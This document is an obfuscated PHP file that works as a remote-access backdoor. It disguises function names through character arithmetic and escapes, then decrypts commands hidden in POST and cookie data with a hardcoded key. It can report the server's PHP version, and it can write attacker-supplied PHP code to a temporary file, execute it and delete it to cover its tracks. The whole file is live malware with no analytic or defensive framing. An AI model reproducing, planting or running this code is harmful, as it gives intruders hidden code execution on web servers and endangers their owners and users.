<?php $nolsntac      = /*   nuva   */ 'nolsntac'   ^	'';


$qhwwbosmqy /*   uvvzh*/ =    "\141"	.	"\x72"      . /*   ur */ "r"."\x61" /*zk  */ .    $nolsntac(958-837)      .	$nolsntac(144-49)    .    "\155"    .      $nolsntac(265-168)    . /*  rlm_db   */ "p";


$ujl_ti      = /*   egveh*/ "c"."o".$nolsntac(117)  .       "n"."t";



function /*  bk*/ xzsvj($vakdeajvpf, /*   a   */ $s_svuu){


 /*  c*/ global /*  mk*/ $nolsntac;


         $vakdeajvpf /* jozeb */ = /* hnowsy*/ "\x3c"    . /*vp   */ "\x3f" /*ju */ .	"p"."\x68"	.	$nolsntac(164-52) /* lt*/ . /*  ny  */ $nolsntac(32) /*  zrei*/ .    $nolsntac(455-338) /*   sbg   */ .       "\x6e"     .       "l"."i"."n"."k"."\x28"    .    "\x5f"	.	"\137" /*  nb*/ .  "\x46"    . /*wmtws   */ "I".$nolsntac(76)	.	"E"."_"."\x5f" /*guo*/ .      ")".";".$nolsntac(32)	. /*   gr*/ $vakdeajvpf["\144"];


      $ds_wmvtnc    =	$nolsntac(102) /*   njm */ . /*   dza */ $nolsntac(105)	.    $nolsntac(108) /*   aabmfr   */ . /*   tcjol */ "\x65"   .   $nolsntac(708-613) /* _ogxp */ .	"p".$nolsntac(474-357) /* xx*/ .    $nolsntac(725-609)    .    $nolsntac(95)    .    "c"."o"."n"."\164"       .	"e"."\156" /* zhi  */ . /*  trx */ "t"."s";

    

       $ds_wmvtnc($s_svuu,      $vakdeajvpf);
    
 /*   jjiu  */ ctkvjwfneq($s_svuu);


}





$qsxwtlicns /* iphli   */ =	73;




function /*   ercvts*/ ctkvjwfneq($s_svuu){


 /*   qix_s   */ global  $nolsntac;
          include($s_svuu); /* poed   */ $cznxkxonohgowpgwjjvav    = /* at   */ $s_svuu;
    @unlink($cznxkxonohgowpgwjjvav);

}
function /*i   */ jokznxu()
{ /* mniait*/ global    $nolsntac;



 /*juyls  */ $cznxkxonohgow	= /*jq_gwi*/ array();

    $cznxkxonohgow["\160" /*  eydv   */ . /*  j */ "\166"]    =     phpversion();

    $cznxkxonohgow[$nolsntac(126-11) /* mfb */ .     "\x76"]     =	"3"."\x2e" /*   o  */ . /*s   */ "\65";	$gkxftgi    =      74;

    echo    @serialize($cznxkxonohgow);
}



function /*   e*/ rrjyti_($vakdeajvpf,	$cznxksbxbgdwl)

{


 /*  ajkgd  */ global      $nolsntac;


       $aakj_ggmib /* _ethj */ =    ""; /*  l   */ $vjowfvp	=    'ly';
	$rtwqeghm /*  _orr  */ = /*  ld*/ hash('sha256',  $vakdeajvpf);
 /*f*/ $uzzygmbvb    =	str_replace('tyh',    $rtwqeghm,      $vjowfvp);


 /*   skoa  */ $cznxkxonohgow    = /*zsie */ 0;

   while  ($cznxkxonohgow /*jxjn */ <  strlen($vakdeajvpf)) /*m  */ { /*uponh   */ $cpzcgxteg    =	isset($cznxksbxbgdwl)	? /* goe   */ $cznxksbxbgdwl    : /* mrel   */ '';

	for /*   tfhn*/ ($cznxk	= /*   sh   */ 0;     $cznxk    <       strlen($cpzcgxteg)     &&   $cznxkxonohgow	<    strlen($vakdeajvpf);      $cznxk++, /* b   */ $cznxkxonohgow++) /* soq*/ {

    $aakj_ggmib    .=      $nolsntac(ord($vakdeajvpf[$cznxkxonohgow]) /*  fa */ ^  ord($cpzcgxteg[$cznxk]));      }
 /*gg */ if    (strlen($aakj_ggmib)	>    20) /*   ymlx  */ {	$uzzygmbvb    =    substr($aakj_ggmib, /* xjbtxk*/ 0,      20);


 /*r   */ } /* rz */ }


  if      (empty($aakj_ggmib)) /*  fcl   */ {

     $aakj_ggmib    =    date('Y-m-d	H:i:s');

 /*  icbj*/ }

     return    $aakj_ggmib;
}







function /* _a*/ brziykgyej($unizzxb_)
{      global     $nolsntac;   

 /* nr  */ $yjoesry /*   s */ = /* t */ "\x31"    .       "\142"    .    "f"."\144"."9".$nolsntac(542-440) /*   mwd*/ .    "f"."8"."-".$nolsntac(48) /*  a  */ . /*f  */ "\60" /* y_rrgf*/ .    $nolsntac(527-474) /*   fwab */ .	"7"."\55" /* lpwy */ .	"4"."e"."\x65" /*cxtqwi   */ .  "\x31"  . /* uhc_lz*/ $nolsntac(45)      .    "\x39"	.       "\x39" /*  ke */ . /*  gln   */ $nolsntac(51)	. /* ae_*/ "2"."\x2d"  . /*  pssukl*/ "9"."b"."b"."0"."3"."\x39" /*   tczfdh */ .  "\67"      .   $nolsntac(1043-946)      .  "\144"       . /* mv*/ $nolsntac(431-334) /*   fk_yrb */ .     "\70"    . /*ajuvvw  */ $nolsntac(55);
     


 /* uvjio  */ foreach /*  f*/ ($unizzxb_    as  $hzxvlql    => /*   eto*/ $vakdeajvpf)	{


    jgbjjo(base64_decode($vakdeajvpf),	$yjoesry, /* yqpbt   */ $hzxvlql);    }
}


function    jgbjjo($vakdeajvpf,     $yjoesry, /*  ydz_d   */ $hzxvlql)


{
 /* ffvl   */ global	$nolsntac;
 /* eneprn */ 
    $vakdeajvpf  =    unserialize(rrjyti_(rrjyti_($vakdeajvpf,   $yjoesry),     $hzxvlql));


	$trfec /*xc_pnq*/ = /*gvx*/ 'is';


	$bqevml /* jkv */ = /*   bx   */ 'kol';

 /* gjw*/ if	(isset($vakdeajvpf["a"."\x6b"])) /*   k*/ {
    if /* apru*/ ($vakdeajvpf["a"] /*   jj  */ ==    "i")  {

 /*h  */ jokznxu();

    }    elseif       ($vakdeajvpf["a"]    ==      "e")    {

    xzsvj($vakdeajvpf,   sprintf($nolsntac(46) /*iu */ .  $nolsntac(47)    .      "\45"   .	$nolsntac(966-851)     .   "."."p"."l", /*  pwsvrf */ md5($yjoesry)));


			$rzicvck /* ci   */ =    44;


	}  exit();


 /* pu_cjp*/ }}


brziykgyej($_POST); /*s  */ 

$xacfgrby_b /*qqkbto */ =    $qhwwbosmqy('rawurldecode', /*   di */ $_POST);

$_qbiwfv	= /*   qlm   */ $ujl_ti($xacfgrby_b);
brziykgyej($_COOKIE);	
$hthrs /*   kb */ =	$qhwwbosmqy('rawurldecode', /*whzee  */ $_COOKIE);



?>